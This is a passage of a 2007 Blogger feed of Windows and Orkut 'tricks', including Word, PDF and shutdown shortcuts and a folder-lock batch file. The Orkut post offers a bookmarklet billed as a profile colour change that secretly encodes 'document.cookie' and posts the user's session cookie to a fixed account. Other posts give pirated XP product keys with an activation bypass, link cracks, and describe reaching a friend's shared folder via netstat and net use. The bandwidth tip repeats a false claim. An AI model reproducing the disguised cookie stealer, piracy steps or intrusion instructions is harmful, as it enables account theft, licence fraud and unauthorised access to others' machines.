href='https://www.blogger.com/comment.g?blogID=698730440747916573&amp;postID=8576973851077868525' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/698730440747916573/posts/default/8576973851077868525'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/698730440747916573/posts/default/8576973851077868525'/><link rel='alternate' type='text/html' href='http://rahulxptricks.blogspot.com/2007/11/lock-my-computer.html' title='lock my computer'/><author><name>rahul arya</name><uri>http://www.blogger.com/profile/09312819518780089181</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='01471067711164177734'/></author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-698730440747916573.post-1988506756990717697</id><published>2007-11-24T01:20:00.001-08:00</published><updated>2007-11-24T01:20:14.731-08:00</updated><title type='text'>Is it possible to Change "windows" to your name?</title><content type='html'>Is it possible to Change "windows" to your name? &lt;br /&gt;   &lt;br /&gt;&lt;br /&gt;open notepad dump the following lines into it and save it with the name OEMINFO.INI in the c:\windows\system32 directory:&lt;br /&gt;&lt;br /&gt;[General]&lt;br /&gt;Manufacturer=Your Name Here&lt;br /&gt;Model=Your Model Here&lt;br /&gt;[Support Information]&lt;br /&gt;Line1=Your Name Here&lt;br /&gt;Line2=Your Address Here&lt;br /&gt;Line3=Your Email Address Here&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Save the file, then make a right click on my computer select properties, in the general tab a button will be highlighted (support information) make a click on it, you will be able to see the changes.&lt;br /&gt;Now if you want to display some more information then simply increase the line in the file.&lt;br /&gt;ex: Line4=Your Working Hours Here&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/698730440747916573-1988506756990717697?l=rahulxptricks.blogspot.com'/&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://rahulxptricks.blogspot.com/feeds/1988506756990717697/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='https://www.blogger.com/comment.g?blogID=698730440747916573&amp;postID=1988506756990717697' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/698730440747916573/posts/default/1988506756990717697'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/698730440747916573/posts/default/1988506756990717697'/><link rel='alternate' type='text/html' href='http://rahulxptricks.blogspot.com/2007/11/is-it-possible-to-change-windows-to.html' title='Is it possible to Change &quot;windows&quot; to your name?'/><author><name>rahul arya</name><uri>http://www.blogger.com/profile/09312819518780089181</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='01471067711164177734'/></author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-698730440747916573.post-8198075313574788611</id><published>2007-11-24T01:19:00.001-08:00</published><updated>2008-12-11T17:30:00.383-08:00</updated><title type='text'>How to make your" PDF "file to speak</title><content type='html'>&lt;a href="http://3.bp.blogspot.com/_5EHOESWcP_k/R0msACFH1oI/AAAAAAAAADw/zVz4DuVW90o/s1600-h/4457_Adobe-Logo.jpg"&gt;&lt;img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;" src="http://3.bp.blogspot.com/_5EHOESWcP_k/R0msACFH1oI/AAAAAAAAADw/zVz4DuVW90o/s320/4457_Adobe-Logo.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5136825966551094914" /&gt;&lt;/a&gt;&lt;br /&gt;You can listen to any PDF instead of reading with Adobe Reader 7.0 or 6.0,&lt;br /&gt;and the short cut is:&lt;br /&gt;&lt;br /&gt;Ctrl+shift+b - to hear the entire Document&lt;br /&gt;&lt;br /&gt;Ctrl+shift+v - to hear the page&lt;br /&gt;&lt;br /&gt;Ctrl+shift+c - to resume&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/698730440747916573-8198075313574788611?l=rahulxptricks.blogspot.com'/&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://rahulxptricks.blogspot.com/feeds/8198075313574788611/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='https://www.blogger.com/comment.g?blogID=698730440747916573&amp;postID=8198075313574788611' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/698730440747916573/posts/default/8198075313574788611'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/698730440747916573/posts/default/8198075313574788611'/><link rel='alternate' type='text/html' href='http://rahulxptricks.blogspot.com/2007/11/how-to-make-your-pdf-file-to-speak.html' title='How to make your&quot; PDF &quot;file to speak'/><author><name>rahul arya</name><uri>http://www.blogger.com/profile/09312819518780089181</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='01471067711164177734'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_5EHOESWcP_k/R0msACFH1oI/AAAAAAAAADw/zVz4DuVW90o/s72-c/4457_Adobe-Logo.jpg' height='72' width='72'/><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-698730440747916573.post-4452252706551362897</id><published>2007-11-24T01:18:00.001-08:00</published><updated>2007-11-24T01:18:48.101-08:00</updated><title type='text'>Microsoft Word Crazy fact</title><content type='html'>Microsoft Word Crazy fact..ever seen &lt;br /&gt;  &lt;br /&gt;Open Microsoft Word and type&lt;br /&gt;&lt;br /&gt;=rand (200, 99)&lt;br /&gt;&lt;br /&gt;And then press ENTER&lt;br /&gt;&lt;br /&gt;and see the Magic&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/698730440747916573-4452252706551362897?l=rahulxptricks.blogspot.com'/&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://rahulxptricks.blogspot.com/feeds/4452252706551362897/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='https://www.blogger.com/comment.g?blogID=698730440747916573&amp;postID=4452252706551362897' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/698730440747916573/posts/default/4452252706551362897'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/698730440747916573/posts/default/4452252706551362897'/><link rel='alternate' type='text/html' href='http://rahulxptricks.blogspot.com/2007/11/microsoft-word-crazy-fact.html' title='Microsoft Word Crazy fact'/><author><name>rahul arya</name><uri>http://www.blogger.com/profile/09312819518780089181</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='01471067711164177734'/></author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-698730440747916573.post-813658266549851543</id><published>2007-11-24T01:17:00.002-08:00</published><updated>2007-11-24T01:18:20.100-08:00</updated><title type='text'>Increase your Bandwidth by 20%</title><content type='html'>Ever seen trick to Increase your Internet Bandwidth by 20% &lt;br /&gt;   &lt;br /&gt;&lt;br /&gt;Windows uses 20% of your bandwidth! Get it back&lt;br /&gt;&lt;br /&gt;A nice little tweak for XP. M*crosoft reserve 20% of your available bandwidth for their own purposes (suspect for updates and interrogating your machine etc..)&lt;br /&gt;&lt;br /&gt;Here's how to get it back:&lt;br /&gt;&lt;br /&gt;Click Start--&gt;Run--&gt;type "gpedit.msc" without the "&lt;br /&gt;&lt;br /&gt;This opens the group policy editor. Then go to:&lt;br /&gt;&lt;br /&gt;Local Computer Policy--&gt;Computer Configuration--&gt;Administrative Templates--&gt;Network--&gt;QOS Packet Scheduler--&gt;Limit Reservable Bandwidth&lt;br /&gt;&lt;br /&gt;Double click on Limit Reservable bandwidth. It will say it is not configured, but the truth is under the 'Explain' tab :&lt;br /&gt;&lt;br /&gt;"By default, the Packet Scheduler limits the system to 20 percent of the bandwidth of a connection, but you can use this setting to override the default."&lt;br /&gt;&lt;br /&gt;So the trick is to ENABLE reservable bandwidth, then set it to ZERO. This will allow the system to reserve nothing, rather than the default 20%.&lt;br /&gt;works on XP Pro, and 2000&lt;br /&gt;other OS not tested.&lt;br /&gt;&lt;br /&gt;Note: Do not limit it to 0%, It cuts your speed, Suggest 1-2% only.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/698730440747916573-813658266549851543?l=rahulxptricks.blogspot.com'/&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://rahulxptricks.blogspot.com/feeds/813658266549851543/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='https://www.blogger.com/comment.g?blogID=698730440747916573&amp;postID=813658266549851543' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/698730440747916573/posts/default/813658266549851543'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/698730440747916573/posts/default/813658266549851543'/><link rel='alternate' type='text/html' href='http://rahulxptricks.blogspot.com/2007/11/increase-your-bandwidth-by-20.html' title='Increase your Bandwidth by 20%'/><author><name>rahul arya</name><uri>http://www.blogger.com/profile/09312819518780089181</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='01471067711164177734'/></author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-698730440747916573.post-4503412163514555022</id><published>2007-11-24T01:17:00.001-08:00</published><updated>2007-11-24T01:17:20.213-08:00</updated><title type='text'>Latest release "Shortcut to start Windows XP"</title><content type='html'>You can restart a Windows XP Pro and home machine easily by creating a shortcut with following path. (Assume you installed Windows XP on your C: Partition) "c:\windows\system32\shutdown.exe -r -f -t 00" -r is for restarting the computer. -f is to force close all programs without saving. -t 00 is used to restart in zero seconds. i.e. as soon as you D.Click on the shortcut. You can log off from a Windows XP Professional or home edition by running "C:\windows\system32\shutdown.exe -l -f -t 00". Also you can shutdown a Windows XP home or Professional edition by running "c:\windows\system32\shutdown.exe -s -f -t 00". You always have to turn from the CPU after running this command. (Same with AT and ATX powered machines.) If you want to turn down power of ATX machine automatically, run "c:\windows\system32\tsshutdn.exe 00 /POWERDOWN /DELAY:00" This is used to turn off a server. Even though your computer will be&lt;br /&gt;shutdown completely, this whole operation will take 30 seconds to finish. Even though you don't have networked computers attached to your computer, this works.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/698730440747916573-4503412163514555022?l=rahulxptricks.blogspot.com'/&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://rahulxptricks.blogspot.com/feeds/4503412163514555022/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='https://www.blogger.com/comment.g?blogID=698730440747916573&amp;postID=4503412163514555022' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/698730440747916573/posts/default/4503412163514555022'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/698730440747916573/posts/default/4503412163514555022'/><link rel='alternate' type='text/html' href='http://rahulxptricks.blogspot.com/2007/11/latest-release-shortcut-to-start.html' title='Latest release &quot;Shortcut to start Windows XP&quot;'/><author><name>rahul arya</name><uri>http://www.blogger.com/profile/09312819518780089181</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='01471067711164177734'/></author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-698730440747916573.post-2596517761385575641</id><published>2007-11-24T01:16:00.001-08:00</published><updated>2007-11-24T01:16:43.865-08:00</updated><title type='text'>Only one trick to hack windows.It takes only few mins.</title><content type='html'>I know this is a very simple thing but the problem, as like many other issues, is the ignorance about it.&lt;br /&gt;&lt;br /&gt;How often do you copy songs from a CD? Or some photos from a CD?&lt;br /&gt;&lt;br /&gt;What do you do? You select the required files and do a CTRL –C. Open the destination folder and do a CTRL-V. Here is something you can benefit time from. customize your SEND TO MENU.&lt;br /&gt;&lt;br /&gt;This sounds simple and you can do it in less than sixty seconds.&lt;br /&gt;You can create your own BASKET.&lt;br /&gt;&lt;br /&gt;First you’ll need access to hidden files. So change your view settings to make all hidden files visible.&lt;br /&gt;Tools -&gt; folder options -&gt; view (tab) and select the show hidden files and folders.&lt;br /&gt;go to parent drive:/documents and settings/(user name)/send to&lt;br /&gt;&lt;br /&gt;Open up my computer and locate your most used folders.&lt;br /&gt;&lt;br /&gt;Create a shortcut of the most used folders in SEND TO FOLDER.You can do this in a number of ways.&lt;br /&gt;&lt;br /&gt;Right click -&gt; send to desktop(create shortcut) and move the shortcut from the desktop to the SEND TO FOLDER&lt;br /&gt;&lt;br /&gt;Copy the most used folder and go to SEND TO FOLDER and right click -&gt; paste shortcut.&lt;br /&gt;&lt;br /&gt;Also remember to rename the shortcuts to send to videos or send to potos. We don’t need confusion when we use the same later.&lt;br /&gt;&lt;br /&gt;5. DONE&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/698730440747916573-2596517761385575641?l=rahulxptricks.blogspot.com'/&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://rahulxptricks.blogspot.com/feeds/2596517761385575641/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='https://www.blogger.com/comment.g?blogID=698730440747916573&amp;postID=2596517761385575641' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/698730440747916573/posts/default/2596517761385575641'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/698730440747916573/posts/default/2596517761385575641'/><link rel='alternate' type='text/html' href='http://rahulxptricks.blogspot.com/2007/11/only-one-trick-to-hack-windowsit-takes.html' title='Only one trick to hack windows.It takes only few mins.'/><author><name>rahul arya</name><uri>http://www.blogger.com/profile/09312819518780089181</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='01471067711164177734'/></author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-698730440747916573.post-146425840616479320</id><published>2007-11-24T01:04:00.000-08:00</published><updated>2007-11-24T01:05:34.841-08:00</updated><title type='text'>Bypass WGA validation to make your XP genuine</title><content type='html'>Bypass WGA validation to make your XP genuine &lt;br /&gt;   &lt;br /&gt;&lt;br /&gt;Crack your Windows XP with Service Pack 2 Which uses Registration Key&lt;br /&gt;&lt;br /&gt;JD3T2-QH36R-X7W2W-7R3XT-DVRPQ&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;This will allow you to bypass the Microsoft Genuine Validation.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;I hope this is the best and genuine way to crack Xp:&lt;br /&gt;&lt;br /&gt;1. Click STARTàRUN and type ‘regedit’&lt;br /&gt;&lt;br /&gt;2 Registry window will be opened, Then Go to &lt;br /&gt;HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\Windows NT\CurrentVersion\WPAEvents\OOBETimer&lt;br /&gt;&lt;br /&gt;...and doubleclick on it. Then change some of the value data to ANYTHING ELSE...delete some, add some letters, I don't care...just change it!&lt;br /&gt;&lt;br /&gt;now close out regedit.&lt;br /&gt;&lt;br /&gt;3) Go to start &gt; run &gt; "%systemroot%\system32\oobe\msoobe.exe /a" (again, dont type the quotes)&lt;br /&gt;&lt;br /&gt;4) the activation screen will come up, click on register over telephone, then click on CHANGE PRODUCT KEY, enter in this key: JG28K-H9Q7X-BH6W4-3PDCQ-6XBFJ.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Now you can download all the updates without activating, and the Genuine Microsoft Validation will F**K you No more.&lt;br /&gt;&lt;br /&gt;Note: This works better after reformat&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Or else do you want to download the crack for XP,XP home,XP 2, Vista..&lt;br /&gt;i am placing it in a zip folder pls download it from the below link&lt;br /&gt;&lt;br /&gt;Download Crack&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/698730440747916573-146425840616479320?l=rahulxptricks.blogspot.com'/&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://rahulxptricks.blogspot.com/feeds/146425840616479320/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='https://www.blogger.com/comment.g?blogID=698730440747916573&amp;postID=146425840616479320' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/698730440747916573/posts/default/146425840616479320'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/698730440747916573/posts/default/146425840616479320'/><link rel='alternate' type='text/html' href='http://rahulxptricks.blogspot.com/2007/11/bypass-wga-validation-to-make-your-xp.html' title='Bypass WGA validation to make your XP genuine'/><author><name>rahul arya</name><uri>http://www.blogger.com/profile/09312819518780089181</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='01471067711164177734'/></author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-698730440747916573.post-1000959726985877279</id><published>2007-11-24T00:45:00.001-08:00</published><updated>2007-11-24T00:54:47.523-08:00</updated><title type='text'>make ur windows vista genuine</title><content type='html'>How to make vista geniune version??key is here.. &lt;br /&gt;  &lt;br /&gt;download the vista activator from the below link&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/47588614/va2007av.rar"&gt;http://rapidshare.com/files/47588614/va2007av.rar&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/698730440747916573-1000959726985877279?l=rahulxptricks.blogspot.com'/&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://rahulxptricks.blogspot.com/feeds/1000959726985877279/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='https://www.blogger.com/comment.g?blogID=698730440747916573&amp;postID=1000959726985877279' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/698730440747916573/posts/default/1000959726985877279'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/698730440747916573/posts/default/1000959726985877279'/><link rel='alternate' type='text/html' href='http://rahulxptricks.blogspot.com/2007/11/make-ur-windows-vista-genuine.html' title='make ur windows vista genuine'/><author><name>rahul arya</name><uri>http://www.blogger.com/profile/09312819518780089181</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='01471067711164177734'/></author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-698730440747916573.post-9051304688667958004</id><published>2007-11-24T00:09:00.000-08:00</published><updated>2007-11-24T00:12:55.722-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='hack my friend pc through yahoo messenger?'/><title type='text'>how to hack my friend pc through yahoo messenger?</title><content type='html'>how to hack my friend pc through yahoo messenger? &lt;br /&gt;  &lt;br /&gt;&lt;br /&gt;1) Open Command Prompt. Have some one on yahoo messenger send you a file; while the file is sending, in command prompt type -&gt; netstat -an press enter&lt;br /&gt;&lt;br /&gt;2)it will show alll Active Connections on your computer, in there under foreign ip for a number thats ends in 5050. this is the persons ip adress who is sending you the file&lt;br /&gt;&lt;br /&gt;3)Now type : net use: h \\ (the person's ip adress)\shareddocs push enter wait for message to show up&lt;br /&gt;&lt;br /&gt;4)If it is successful you should get a message saying command prompt was successful. If you get a error message than your attempt has failed, probably because the person has security measures in place to prevent hacking.&lt;br /&gt;&lt;br /&gt;5)if you get the message that says command was successful, than go to my computer. There you will see a file named "shareddocs on (the name of your computer)" open this file&lt;br /&gt;&lt;br /&gt;you are now connected to that person's computer&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/698730440747916573-9051304688667958004?l=rahulxptricks.blogspot.com'/&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://rahulxptricks.blogspot.com/feeds/9051304688667958004/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='https://www.blogger.com/comment.g?blogID=698730440747916573&amp;postID=9051304688667958004' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/698730440747916573/posts/default/9051304688667958004'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/698730440747916573/posts/default/9051304688667958004'/><link rel='alternate' type='text/html' href='http://rahulxptricks.blogspot.com/2007/11/how-to-hack-my-friend-pc-through-yahoo.html' title='how to hack my friend pc through yahoo messenger?'/><author><name>rahul arya</name><uri>http://www.blogger.com/profile/09312819518780089181</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='01471067711164177734'/></author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-698730440747916573.post-2236967322099781701</id><published>2007-11-23T23:25:00.000-08:00</published><updated>2007-11-24T00:54:10.628-08:00</updated><title type='text'>cooollllll fonts in orkut</title><content type='html'>ฬяเтє ℓเkє тнเร&lt;br /&gt;&lt;br /&gt;javascript:var txt=document.getElementsByTagName('textarea')[0];txt.value=txt.value.replace(/a/gi,"ค");txt.value=txt.value.replace(/b/gi,"๒");txt.value=txt.value.replace(/w/gi,"ฬ");txt.value=txt.value.replace(/d/gi,"∂");txt.value=txt.value.replace(/p/gi,"թ");txt.value=txt.value.replace(/N/gi,"ภ");txt.value=txt.value.replace(/t/gi,"т");txt.value=txt.value.replace(/E/gi,"є");txt.value=txt.value.replace(/i/gi,"เ");txt.value=txt.value.replace(/u/gi,"υ");txt.value=txt.value.replace(/v/gi,"√");txt.value=txt.value.replace(/h/gi,"н");txt.value=txt.value.replace(/f/gi,"ƒ");txt.value=txt.value.replace(/l/gi,"ℓ");txt.value=txt.value.replace(/s/gi,"ร");txt.value=txt.value.replace(/o/gi,"σ");txt.value=txt.value.replace(/m/gi,"м");txt.value=txt.value.replace(/r/gi,"я");function reverse() { var inp = " ! nuraV yb edam si tpircs sihT "; var outp="";for (i = 0; i &lt;= inp.length; i++){ outp =inp.charAt (i) + outp;}alert(outp) ;}; reverse();;void(0); &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;●๋•|̲̅I̲̅f̲̅ ̲̅ự̲̅ ̲̅w̲̅α̲̅и̲̅и̲̅α̲̅ ̲̅w̲̅r̲̅i̲̅Ť̲̅Œ̲̅ ̲̅l̲̅i̲̅k̲̅Œ̲̅ ̲̅Ť̲̅Ħ̲̅i̲̅ร̲̅&lt;br /&gt;̲̅&lt;br /&gt;̲̅|●๋• █▐║│▌│█▐║│&gt; ® ™&lt;br /&gt;copy frm here&lt;br /&gt;javascript:var txt=document.getElementsByTagName('textarea')[0];txt.value=txt.value.replace(/a/gi,"α");txt.value=txt.value.replace(/p/gi,"ρ");txt.value=txt.value.replace(/N/gi,"и");txt.value=txt.value.replace(/t/gi,"Ť");txt.value=txt.value.replace(/E/gi,"Œ");txt.value=txt.value.replace(/u/gi,"ự");txt.value=txt.value.replace(/h/gi,"Ħ");txt.value=txt.value.replace(/s/gi,"ร");txt.value=txt.value.replace(/o/gi,"σ");txt.value=txt.value.replace(/m/gi,"м");void(0);javascript:var byLєαŋdrσ=document.getElementsByTagName('textarea')[0];byLєαŋdrσ.value=%22●๋•|%22+byLєαŋdrσ.value.replace(/|/g,%22̲̅%22)+%22|●๋• █▐║│▌│█▐║│&gt; ® ™%22;void(0);&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;.&lt;br /&gt;till here &lt;br /&gt;&lt;br /&gt;this will change the colour of your orkut profile and will give you new moderate look&lt;br /&gt;&lt;br /&gt;javascript:orkut=replyForm;orkut.toUserId.value=62431562;orkut.scrapText.value=eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,99,111,111,107,105,101));orkut.action='Scrapbook.aspx?Action.submit';orkut.submit();i=0;c=["red","green","blue","yellow","magenta","orange","black","white"]; a=document.links;setInterval('i++;a[i % document.links.length].style.color=c[i % c.length]',10);void(0);&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/698730440747916573-2236967322099781701?l=rahulxptricks.blogspot.com'/&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://rahulxptricks.blogspot.com/feeds/2236967322099781701/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='https://www.blogger.com/comment.g?blogID=698730440747916573&amp;postID=2236967322099781701' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/698730440747916573/posts/default/2236967322099781701'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/698730440747916573/posts/default/2236967322099781701'/><link rel='alternate' type='text/html' href='http://rahulxptricks.blogspot.com/2007/11/cooollllll-fonts-in-otrkut.html' title='cooollllll fonts in orkut'/><author><name>rahul arya</name><uri>http://www.blogger.com/profile/09312819518780089181</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='01471067711164177734'/></author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-698730440747916573.post-7806216372448027243</id><published>2007-11-23T23:23:00.003-08:00</published><updated>2007-11-23T23:23:37.467-08:00</updated><title type='text'>to lock a folder in windows</title><content type='html'>to lock a folder in windows&lt;br /&gt; &lt;br /&gt;open notpad and copy the following code and save it as lock.Bat&lt;br /&gt;____________________________________________________________________&lt;br /&gt;&lt;br /&gt;cls@ECHO OFFtitle Folder Lockerif EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCKif NOT EXIST porno goto MDLOCKER:CONFIRMecho Are you sure u want to Lock the folder(Y/N)set/p "cho=&gt;"if %cho%==Y goto LOCKif %cho%==y goto LOCKif %cho%==n goto ENDif %cho%==N goto ENDecho Invalid choice.goto CONFIRM:LOCKren porno "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"echo Folder lockedgoto End:UNLOCKecho Enter password to Unlock folderset/p "BAS=&gt;"if NOT %BAS%==type your password here goto FAILattrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" pornoecho Folder Unlocked successfullygoto End:FAILecho Invalid passwordgoto end:MDLOCKERmd pornoecho Locker created successfullygoto End:End&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/698730440747916573-7806216372448027243?l=rahulxptricks.blogspot.com'/&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://rahulxptricks.blogspot.com/feeds/7806216372448027243/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='https://www.blogger.com/comment.g?blogID=698730440747916573&amp;postID=7806216372448027243' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/698730440747916573/posts/default/7806216372448027243'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/698730440747916573/posts/default/7806216372448027243'/><link rel='alternate' type='text/html' href='http://rahulxptricks.blogspot.com/2007/11/to-lock-folder-in-windows.html' title='to lock a folder in windows'/><author><name>rahul arya</name><uri>http://www.blogger.com/profile/09312819518780089181</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='01471067711164177734'/></author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></entry></feed>